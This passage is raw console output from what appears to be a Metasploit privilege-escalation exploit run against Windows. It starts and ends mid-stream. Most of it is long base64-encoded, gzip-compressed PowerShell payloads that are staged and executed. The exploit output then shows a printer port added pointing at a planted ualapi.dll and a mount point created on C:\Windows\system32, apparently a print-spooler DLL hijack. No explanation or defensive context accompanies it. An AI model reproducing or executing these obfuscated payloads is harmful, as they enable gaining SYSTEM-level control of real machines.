BPAGcAdAA5AG0AdgBrAFMAMwBFADYAUgByADkAWABvAHYAOABNAHIAWABjAGIAOAB1AFkANQBaAHUAegBmAHUAZQA1ADQAcgBiAG0AWAAzADgAUAA4ACsAeAByAHgAQwBlACsARABUADMAMgAvADMAWgBIAFAAeQBuAHoAeAB3ADcAOABiAGUAZQA2AFkANQBOACsARgBWAEQAZAA1AHYAdQA2AEkAMwAyAGYASAB5AGIAOQB6AGUAawAvAFYAOQBmAGQATgB2AEoAOAAwAC8AMwBsAHYANwB2ADEAeAA4AGgAeQBmADgAdQArAGoANQBTAFQAcgBnAGMAbwA2AEoAUABYAHoANwBFAHYAZgBwADgALwBlADgANQByAFAATABwAG4ASABQAGIALwBuADMAMgBkAE8AOABKAEwATwA4ACsAKwBZAHcAegByAHYARwBkAEMAWABrAGUAZgBJAGwAWAA5AEgAYwBSADQAOQBKADcAdQArAC8AYgB0AEoANABmADEASwB6AFIAeQBVADUANABiAGEAOAAyAFgANwB0ADcANQBrAEQAMwBUAHAAOQB5AHQATgAzAHUAZABtAC8AVABhAEYAYgAxADIAWABvAHoAYgBIAEYAVAAwAFAAUABrAHYAUABpAC8ANABkAGEAUQB0AC8AbABPADcATABXAC8AYwBoADkARABWADcATABYAFIAVAA1AGIAMwBwAE4AYgBoAHYAVQB2ADcAOQBZACsAMwBmADcAUQBiAHcAVwBhAEoAdQBHAHYAOABlAGYAQQBiADMANwA4AEgAbAAwAHYAcwBZADcAMwBrAFMAOQBiAFMAbABIAHQARgBQAC8ASAA4AFUAVwBYADgASwBOADMAawBmADcAMwAzAHMAWQA1ADYAZgBpAEYATQBKAEQAagA4AFMAbAA4AFoAOQArAGMAeAA5AEEAKwArAHYASABSAC8AdgArAFYANgB0AHYAegAwAFgATwBnADgAVAA2ADEAegAvAFQAbQAzAGQAMwAzAGgAKwA4AE8AKwBEAEEAZQA1AEsAOAB2AFAAdQBIAC8ALwAxAHIAbgA0ACsAUABiADMANwBuAC8AOABGAHYAZgBwAFgAawBJAEUAZgBBAEEAQQA9ACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA -InputFormat None
[+]  - Bytes remaining: 4608
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBWAGwAMgBsADgAQwBBADQAVwBZAFQAMwBQAGkAUwBoAEwARQB2ADgAcgBlAHYAQgB2AHgARABvAHoALwBoAGUAUABkAFMAaQBBAEUATgBvAEoAcABrAEcAQwBrAGoAVAAyAEEASQBHAFMAYgBHAGUATQB4AEgAagBUADIAcAAzAC8ANQBxACsAWgB0ADcARwAxADkASQBSAEQAcQA3AHEAcQBzAHoASwB4AHEALwB6AHQAOQBPAFQAMgA5AEgAVgA1ACsANwBGADcAZQAvAC8AUABuAG4ANAB2AGQAKwAvADgAOABXAEsANwBmAG4AdABhAGIANwA3AHQALwBYAHYAVAAwAGQALwBsADQAbgBQADgAWQAvACsAZwBQAEwAdgA2ADQAcQBOAHAAawBaAHMAUABXAHEAcABDADgAVwA1AHAAYgBFAFoASwBmAE4AbQBwAHQAWQBmAFoAaABhAFcAVgA1AGwAMgBTAFcAagBmAFUAOQArAFcAVwBqAHgAdQByAFcAVAB0AFkALwAyAGsATwBYAHAARABiAEsATABiAGUAawBzAEcARgBsAEcALwA4AGMAMgA3AHgATgBQAGwAbgBYAGQATQBtAHIARABjADMASwBOAHEAawBzADcAZQBtADcAZgBWAHEAMgB0ADAAMgBYAEQARABoAG4ASAB0AGcAdgA1AC8AdQAxAFoAWQAzAE4AUQB2AEoAbwB3ADkASgBXAGIAWABKAGoAbwA0AFAAMgB0AGQAKwBXAE4AagBZADMAUABVADgAUABWAG4AVgAyAGEAYwBPAEcAYwA1ADUAdABZAEwAWQBKAHkAZABRAEcAcQBhADEATQA3AHcALwBHAHIARQB2AFAANgAxAGUAVwBlAFQANABUADQAdABMAG4AdwBJAGIAQgBHAGkATwBQAG4AdQAxAEMAcwBpAGEATwB4AHEAeQB6AFEAUwBEAGUAZwAyAFcAVgB6AGIAdgBrAG4AbgBPAFcAYgBmAEoAaQBvADcARQB0AHUANgBSAG4ANgBkADcAcQBrAEQAegB4ACsAOABiAFgAZAA3AFoAbwBrADYAVwBsAFgAZAB4AFAAOABTAG0ATwAwAHQASQBVAFAARgA0AHQASwAyADMAUwA2AGYAegBVADMALwB0AE4AbgBuAHIAKwBhAEMATQBqAHYANQA1AGwAZAB6AFoAdAA3AFkAYgA5AHEAeQA2AFoARQAxAGQAaAArAGgAdwA1ADcAagBmAHMAawA3AGYASwBUACsAOQByAGYAYwBLADUAMgA1AEMAbwBEAHEAMQArAHQAeQB2AHkAMwByAFcASgBjAEIAQgB1AEwAWABrADEARgBrAEwAUwB0ADUASABlAGEANQBYAFgAbwBMAEcAaQBWAFIAMwA0ADUAUABtAGcAcwB0AEIAcABuADkAVAB6AGYATwBQADkAcQBkAGsAWAA2AHEARwA2AGoATQBCAGQAZQBYADAAUwBaACsANQAxAFMAZgBtAGMAdwBJAGQAMQBtAHoAeABZAGwAbwBQAEgAdgBRADAAUAA0AEgARQBGAEQANABSAFQAUQBkAHkATABvAEgAMABIAEwAZgBWAC8AcwA5AEgAZQAxAHAAWgA4AHAAZQA0AFYAKwBJAHMASABXADAAdQArAHcANQBkADUARQBGADkARwBwAGUASwB6AEgAbgBVAEoAUQBiAHoASwBVAG0AcwBDADkAUgBRAE8AcgBlAEwAUgBlAGQATQB1ADQAcgBvAEoAZABzADMAKwBjADgAZQBKAE8ATwBDAE4AKwBCAEQASQB5ADMAawBqAFgAcQBXADIATQA4AFUAbgAzAEUASwBiAGQAUABCAHgAeQBmADcAQwBwAFEARwBmAFUAYgBDADYAVQAxADIAVgB2ACsASQBiAGcANgBQAHEAbQBCAEoALwBRADMAMQBVAFIAKwBVAGwAMwBJAGcAagBxAFQAMwArAEQAdAA3AHYAYgBSAG4AZwA0ADgARQBLADgAcwB3ADgAagA5AHkARwBlACsAcQBoADkAZABmAFUANwBRAHQANQA2AEwAMABIAGMAQwA3AEIAVwBYAFUAdAAyAEQAZgBpAE0AQwBTAGUASABmAEUAcQBUAHEAMQAvADQAbABQAG4AMwBIAHEAZQBaADcAdwBWAHoANQBMADMAaABPAE0ASwBuAEwAWAAvAFQAOABjAFoAWAB1AHUAOAAzAEgAawBSAGkASwB2AGsAUABhADEALwBoAHIAZAByACsASgBjADUATAB4AGUAVwBIAHQASABGAEoAMwBrAHEAcgB6AEgAeABMAEQAcgBoAHAAbgBpAHEASQBEAHoARQBUACsARgB6AHkAMwBrAHoAZABDAEkAKwBiADAAeQA0AEMAMABmAHgANgBwAFAAOAA5AEgAdABOAFgASQBGADYAUwBFADgAYgA4AEYARAArAEQAVABxAFEAbgBzAFQAWABhADMAUQBrAEgAdQB0ADUASQBJADQASAB6AGkAdABkAEQAeQBYADgAdQA0AEUASABwAGUAbABjADQAVAA5AGwAUAArAEUAMABCADMALwBoAEwARAB3AG0AegBzAE8AegB6AHMAUwA3AEgAKwBBAGgAWABlAC8AeABCACsAWAB4AEcANwA2AHIAZgBoAC8AbwBjAGQASABhAEcAMwBrAHQAVwBjAC8AegBrAEoAegB3AEEANwAzAC8AQQBZADkAegB4ADgALwA5AEoAegB2AFgASgA3AFYAMABUAEgANQBMAFAAcAAyAFAAVQBTAGYASwArAHcANABlADEATwBEAGkAKwBYAHMAKwA0AHIAbgAwAG8AdQBkAFAAeABGADMAagBlACsATABSADAAdgAyAHMASQBlADgAMwA4AEMANwBJAFQAMwBHAFcANwBLAE4AMQAwAHQAcwA3AHUAcQAxAGQAZgA0ADcASABwAGYAcwBaAE8AawBpAHYAVwBWAGMAUQBiADQAVgB1AGgATwBQAFUALwBTAHQARgBoAHkAdQArAHEANAA2AHUAQgA5AFgANwAyADkAbgBIADMAcAAxAEgASABmAEcATwAwAGYAMABUAHUAaABCAHYAcgBvAGkAbgB3AG8AKwBJAEoAMABUAGYASwB1AEgAVABDAE4AegB3AHIAUgBiAGYALwBJAFoAZgBiAFoAeAAvAGUAOQBiADMAMABjADAAYQAvAEQATABYAGEAMABLAGMAQQBmADkAVAAzAEkAcgBqAHgAWABsAEkAWABOAGsAUgBIAGkANgBvAGgALwBOAGUAdQBHACsASQBTADMAawBIAGMAQgBtAGwATQBUAC8AeABJAG8AYwBuAFcAaQA5AGYAbQAxAHAAYQBpAGwAKwBxADMAOABEADUATwB3AFAASABLAGUAKwBuADYAQgBDAGQAQgArAEkANABzAEgANQBHAC8AOQBEADYAZwBqAHEAeABEADMANgBtAGUAcwBpAEgAdgBvAEMASAArAEgARgAwAHYASQBMAE8AawBXACsAcwBRACsAUwB4AGMAQgBtADQASAAzAG8AKwB5AGcAUAAvAGwAMwAvAE0AQQBuAGsAZABJADUAOABWAHQALwBZADkAdQBaADcAeABHAGYAbQBZADgAdgA0AE4AVABuAG8AZQAvAFoAQgA0AG8ANAA0AFQAKwBMAE4AMQB2ADQAUABYAGUAawA5ADQAYgB4AHgAZgArAG8AWgA0AEwANwA0AFcAbgBmAFoAWABQAE8ASgBQAG4AegB3AGIAegAzADgAUABYAHgANwBSADAAUgBwAC8AMABUAHAAOQBuAHgARABIAG4ATgA5AFYAQgAvAEYAcwBRAGQAegBLAEkANwBmAEIASABuAHoAdQA0AGIAWABxADkAKwA1ADUARwBYADUAeABBAEoAOAByADQAdAB0ADYAdgB5ADMARgBLADMAMABYAEgAZwB2ADMAbwBUAEYAOAB1AFMAUgB1ACsAZABMADQAcgBKAHQAMwBjAEIASQBQADEAKwBBADYAQQB4AGUAZABXADYASwBEAGsAZgB2AGEARABYAHIAYwA0AEMAUABDAFEAWABoADkAUQB4ADgAbAAvAE0AeQA4AFAAaAAvAG4AZgBEAHYAMABNAE0AZQAzAFkAbgA2ADMAeABMAGMAZwBUACsARwBxAFAAbgAvAGwAdgBvAEcALwBVAFgALwA2AHMATQA1AFgAdgBVAHIANABNADYAVwB1AGEAUgBYADcAVwBBAGEAZgA4AFcATgAvAGIANABZAC8AcQA2AC8AdAA0AFYALwB3AHYAawBXAGYAVgBsADMAMQAvAHAASwArAEwAcgArAFoAdwBCAGYAMwBiAC8AbQA4ADEAdgB0ADgAUQBIAHkAKwByAC8AdgBjAE4ALwBKAFUAMwBpAGQAdwArAFIAdQAzAEoAZgAxAE8AZgBKADYAQwByADMAZwBnAFgAcQB6AHcAbAB4AHEAZgBpAHYAVgAvAGoAYgB3AEcAUgArADkAbgB6ADgAUgBkAGcAcQBkADgAYQBjAHMAOABJAGwAMgBLAHoAMABQADYAcAA5AGEAWAB2AEMAKwArAHIAOABIAHQAZwBYADcAWAB2AHcAUABmAFQALwBUAFkAcwBQAC8AQQArACsAaAA5ADcAQwBQAGcAUgBuADgAUwB2AGkAUABYAHUAZQB0AHkAeQB4AHcAMABwAEUAOABUAFIANABqADkAeQAvADIASwBPAEUAcgAwAGQAUgBsAC8AVgAvADcASwBTAHoANwA3AEgAUgA3AE4AOABSAGYAcABRAFAAbwA5AHcAZABjAGQAKwBQAHIAOABKAEQAeQBqAEQAcAA2AEoAVQA5ACsAOQBuADYANwA4AGQALwBmAGoAVAAvAEoAYgB1AFEANQA5ADMAbgBnAEMAagA2AG4AagBlAHkAYwBlADAAMQBmADMAKwBNAG8AagBjAFMAaQArAHoAdgB1AEMANgB5AFQASABQADIAZgBrAE0AWABkAC8AdQBZAE4AWAA3AG8ATQBMADgAcABSAHUAdAAvAFIANwA4AFUATgA4AG4AMwBGAHUAdwBkAHoAawA4AHgARAArAGQAVwBBAGUAcQBGAGkAdgArAG0AUQArAGwANQBFADMAZgBSACsALwBWAGwAeAA2ADcAOABQADkAQQBMADgAVQBuADIAcgA4AFoATwBoAHoAdwBnAEwAZQBUAHQARwBGADYAbABqAFQALwB4AFIAWABnAGYAOQBHAC8ARgArAEoAcAAvAFQANQBxAEcARwBPAGMALwAyAFUAKwBLAFQAMAA2AEwANgBkADQAbQBlADgAMQA2AEcAcgBKADMAVABvAGYAVgBVACsAdgA2AFYAUABpAGoAOQBiAHoAdABkADcAcQB1ACsASgArAGEARgBFAE4AOABKAC8AaQBWACsAQQBFADMAVQBBAGYAMwBDAFQASAAxAGMAKwB2AHgAeQBpAGYAdgBSADkAQwBuADQAagByADgAOABuACsAVQAzAFoAUgB6AHkATgB2AG4AUABnAGUAUgAvAGQANQBzAHgANQA0AHMAZQBPAE8AVQBLADgASwBwAHkALwBSACsAcAAwAE8AcwBkADUASQBxADgAcAAvAFcAegBRAG4AdQBmAEYAQQBOADQAaAB6AGoAZgBVAHEAUwBUAHYANQAvAE8AOAArAG4AegBHAHAAMABhAFAAagBlAE4AcQBrAGEAZgA0AHQALwB0AFUAaQBVACsAOQArAG4AdwBOAFAALwBRAHAASAA3AGcARQA5ADkAcgBpAEgAQwBPACsARAA5AGwASAAvAEwAMABIAHoAeQAyADgAVABaADIAbgAxADgAUwA3AHgAbAArAEYAYQA4AEYAYwBNAHYATAA1AHcALwBOAGYANAB0AE4ARAAvAEkAUAA1ADYAOABDAGMAOQBvAFgAMwBGADgAeQBSADcASQBQAFAASwBCADcARgBlAFEAVgBmAEMAbwB2ACsAcgBzADkAcgBlAEwAVgBpAFQAbABJADkAbAB1AEEAcgAzAGcAWgA4AFoAKwBEADkAMwAvADEAWgAvAEoAKwBmACsAKwBzAFIAWABpAHoAeABDAGMAVgBmAE0AUABlAHIAdgBxADQAbgAxAG4AZgBxAGwAMwBFAE8AbQBMAEgAUAB3AHUAZQAzAEUAbgAzAGYARQBNACsASwB1AFkASgA3AEEASAA0ADcAOAByAG0AagBCADYANQBiAG4AdwBNAGIAZQBIADYARgBYADUAUQBXACsAOQA0AGMAMwArAGQAYwA0AGgASwB2AHAAdgBoAEQANQB1AGYAOABPAHUAUABpAE8ATwBVACsAaAAvAHoAZAAxAHoAegBPAFYAZQB4AGIAOABsAC8ANAB3AHIAbAB4AEQAdgBmADUAYwBJAEUATwBoAHEANgBQAGoAdgBjAGIANQB0AHkAQgA5ADQAawArAGYAcQBFADQAZgBiADUAdgAzAEgAZgBsADgAOAB4AGYAdwB0AHQAOQBSAGYAawAyAEYAdQB1ADMAOAA3AG0AcwBKAGMANABYADEAegA5ACsASgBUADUAVgBQAHMALwB2ADQAZABjADcAZQBSAGYAZwBKAHQANQBzADAAWgBIAHEANwBYAE8AaAA2AHIAagB5AGYAdAAvAEYAZQA4AGYAQQA1AHcAMwB2AHkAdwBXACsASwBkAHoAVwB2AEQALwAwACsAYgA4AEcATAA4ADkAagA2AFAAMwB3AEIANwBqAFYAegBJAGMARAA1AHYASABZAEoAMgB0ADAAdwBIADMASAA1ADYAaQBVADUAegAzAEgAMwBjAC8ATABtAFQAdQBlAHkATwBPAEIAZABhAG4ANwA5ADQAUgArADAAYQBBAFAANABkAHIANABIAE8AWgA5ADUAbgBTACsAWgAvAFgAeABwAGMATABuAGkAagAzAHgAcgBlAE4AYwBwAGIAegBWAFgAKwBZAGgAMwB1AE4ASwBlAEsAcgBQAEcAagB4ADAAegBoAHAAYwA0ADMAegBzADgANQBYADMAaQA5AFQAUABQAGIARgAvAGoAWAArAHAARABqADUAbgB5AHIAZgBuADYARgB2AHIARwB2AFEAMAA4AHYAdABiAHcAdgBjAGQATwBBAHUASABYAFIAdgBuAHAAOAByAG4AYQBxAC8ALwBUAC8AQwB0ADQAWQAvAGkAMwBKADMAdgBFADIAdgBtAFoAOQA5AFgALwBGAEIAZQB3AHUARwBGADMAMgBmACsAZQAyAEQAZAAxADcATQBQADUAbgA0AHUALwBzAEIAYwAwAEUAbgBYAHcAbQBXAEoAUAA0AG0AZgBsAGQAKwBQAGUAcwBUAFoANQAxAHoAdAA3AC8ATwA0ACsASABVAGIAOABlAE4AZQBTAEoAOABIAFgAMwBBAFIATAA1AGsAegB5AFUAUAAxADMAMwBIAFAANgBUAFAAUABSADMAMwA0AC8AVQBiADUAcgA3AGsALwBxAEYANABsAHoANwBuAHYAQgB1AFkAdgA5AFgASABIAHAAYwBmADcASABYAEcAVgBQAHMAOQBXADYASAB6AEMAOQB6AFgAMwBJAHUARQAyAHAAUwArAEkAWgAvAG8AYwBVAG4AKwAvAGIAMABxAGYAagBkAC8AegBqAGYAMABtADcAcwAvAHcAVAAzAGgATQAvAFAANABRAG8AawA2AGwAbwA4AGIANQBoAHcALwBoADgAeQBWADUAMQArADcALwA0AEoASwA1AEgALwBYAFIAYgArADcAMwBKAGQAZABuAEgANwB5AEUAdgAvAHUANABmAFAAMwBxAFgAQwAvADMANQB5ADAANABDAFYAZQAvAFIAMABsAC8ATwArADYAagB3AG0AUABwADkAOAA4ADcANQBpAFQAMwA0ADYAbgBmACsANwB3AGYANQB6ADcAMwBrAEsALwAwAFcAYQBCAEgANABiADIAZwBiADIAcAA5AEgAaQBKAHYAcAA5AFIAZABQAHIAeABrAFQAaABLAE8AWABsAGYATgAxADMANgBmAFYARAAxAEsAZgBGAGoANwByAFAAQwB2AGUATwAvAC8AZQByADUAWABUAGYASABqADQASABOADgAYQBsACsARAB2AFYAaAAvAGIAdwAvAEIAWABxADMAZgAyAFkAcQA4AEYARQAvAEQALwB3AFAAawAzADkAcgB2AEYAMwAxAEgAOAA2AEwANwB5AGMAWgAxAGgAMwA4AHoAMwArAGYAeAAvAHgANwB5AGcAVQAzADcALwAzADUAbgBQAHIAMgBEAGoANQBvAFAAZQBqAFoAcgA3AFoAYgA0AGEANwAvAG4AMwBhAEgAdgB6AHUAOABiADMAdgBmAHoAYwB6AHkAYQBwADUAaQBIAEYARQBmAGwAZgBoAHIAWQBmACsAagA5ADAAdQB6AHcAMwA3AGcAegBuADYATQBPADcARABNADIANQBjAFAAOQBCAE4AKwBJAGYAdQB0ADkAYgBVAEcAZQBnADYATgBkAC8AUABHAFAAaQAvAEsANABlADcAdgA0ADEAMQA5AHIAUwByAGsARwBRAFIASQBBAEEAQQA9AD0AJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None
[+] Payload successfully staged.
[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBWAGwAMgBsADgAQwBBADQAMgBPAFEAUQB1AEMAUQBCAEMARgAvADAAcQBIAEQAWgBYAFMAVQAzAFEAdwB1AG0AUQBXAG4AbwBMAE0ATABoAEsAaAAyADEAQwBiADcAbQB6AE0ATABtAEoAawAvADcAMgBWAEMAagBvADIAcAA4AGUAOAB4AC8AZABlAEgAbQBNAGoAUwBLAEUARQBOAEkAYwB3AFgASQBQADUAZQBlAHcATABFAGsAVgBaAGcAMwBhAGQAVABBAE0ANQBYAGwARABCAFgAWABjAHAAMQBNAEMATgBuAHgAbwBTAGUAQgA1AGMAOQBGAFkAbQBNAGwAcAAyAHEAUwBMAGoAYgA4AHEAcgA5AGIAcgBoAGcALwBIAFIAUABQADgASAA3AHIATABqACsASQBOAC8AegBoAEoAcwBWAEEAVgArADMATgA0AEkAdABCAFkASwBCADgAeABsAGIAcgA2AEQAMQBnAFEAeABjAG4AVwB5AGoAWgBhAFUAbwBiAEEAYQBBAGsAdAA4AHIAKwBoAEQAawBjAEkARwBxAEMAOQBhAGsAWgBLAEwAUQBzAE4AMAA4AG4AVwA1ADEAOQA4AEwAeQBMAEgAWABiAE8AMABBAEEAQQBBAD0AJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA=
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBWAGwAMgBsADgAQwBBADQAMgBPAFEAUQB1AEMAUQBCAEMARgAvADAAcQBIAEQAWgBYAFMAVQAzAFEAdwB1AG0AUQBXAG4AbwBMAE0ATABoAEsAaAAyADEAQwBiADcAbQB6AE0ATABtAEoAawAvADcAMgBWAEMAagBvADIAcAA4AGUAOAB4AC8AZABlAEgAbQBNAGoAUwBLAEUARQBOAEkAYwB3AFgASQBQADUAZQBlAHcATABFAGsAVgBaAGcAMwBhAGQAVABBAE0ANQBYAGwARABCAFgAWABjAHAAMQBNAEMATgBuAHgAbwBTAGUAQgA1AGMAOQBGAFkAbQBNAGwAcAAyAHEAUwBMAGoAYgA4AHEAcgA5AGIAcgBoAGcALwBIAFIAUABQADgASAA3AHIATABqACsASQBOAC8AegBoAEoAcwBWAEEAVgArADMATgA0AEkAdABCAFkASwBCADgAeABsAGIAcgA2AEQAMQBnAFEAeABjAG4AVwB5AGoAWgBhAFUAbwBiAEEAYQBBAGsAdAA4AHIAKwBoAEQAawBjAEkARwBxAEMAOQBhAGsAWgBLAEwAUQBzAE4AMAA4AG4AVwA1ADEAOQA4AEwAeQBMAEgAWABiAE8AMABBAEEAQQBBAD0AJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None
[+] Cleaning up 5972
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBwAGwAMgBsADgAQwBBADQAdAAyAHoAUwB2AEwATABNAHIAUAB5ADAAMwBOAEsANABtADEAcwBuAEoAUABMAFUARQBTAEMARQBzAHMAeQBrAHgATQB5AGsAawB0ADEAbABBAFAATABVADQAdABVAHQAZgBVAHkAMAA2AHQATABLADQASgBUAHMAMQBKAFQAUwA3AFIARABTADQAcAB5AHMAeABMAFYAOABnAG8ARABzAHIAMQB6AEgAVgAyAHEAVgBHAHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgBTAFAAYQBUAHIANABRAEEAQQBBAEEAPQAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAE4AcQBCAEcAVwBhAHoASQAnADsA -InputFormat None
[*] Exploit output:
#< CLIXML
[+] Added PrinterPort successfully on C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll
[+] Mount point created successfully on C:\Windows\system32
True
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="1"><TNRef RefId="0" /><MS><I64 N="SourceId">2</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="2"><TNRef RefId="0" /><MS><I64 N="SourceId">3</I64><PR N="Record"><AV>Remove-Printer -Name ZVRhh -ErrorAction SilentlyContinue | Out-Null</AV><AI>1249526970</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="progress" RefId="3"><TNRef RefId="0" /><MS><I64 N="SourceId">4</I64><PR N="Record"><AV>Remove-PrinterPort -Name C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll -ErrorAction SilentlyContinue | Out-Null</AV><AI>2121746085</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="progress" RefId="4"><TNRef RefId="0" /><MS><I64 N="SourceId">5</I64><PR N="Record"><AV>Add-PrinterDriver -Name "Generic / Text Only"</AV><AI>1947714376</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="progress" RefId="5"><TNRef RefId="0" /><MS><I64 N="SourceId">6</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj><Obj S="progress" RefId="6"><TNRef RefId="0" /><MS><I64 N="SourceId">7</I64><PR N="Record"><AV>Add-PrinterPort -Name C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll  | Out-Null</AV><AI>1119052494</AI><Nil /><PI>-1</PI><PC>100</PC><T>Completed</T><SR>0</SR><SD>1/1 completed</SD></PR></MS></Obj><Obj S="information" RefId="7"><TN RefId="1"><T>System.Management.Automation.InformationRecord</T><T>System.Object</T></TN><ToString>[+] Added PrinterPort successfully on C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll</ToString><Props><Obj N="MessageData" RefId="8"><TN RefId="2"><T>System.Management.Automation.HostInformationMessage</T><T>System.Object</T></TN><ToString>[+] Added PrinterPort successfully on C:\Users\msfuser\AppData\Local\Temp\XLNioGOxfU\ualapi.dll</ToString><Props><S N="Message">[+] Added PrinterPort successfully on 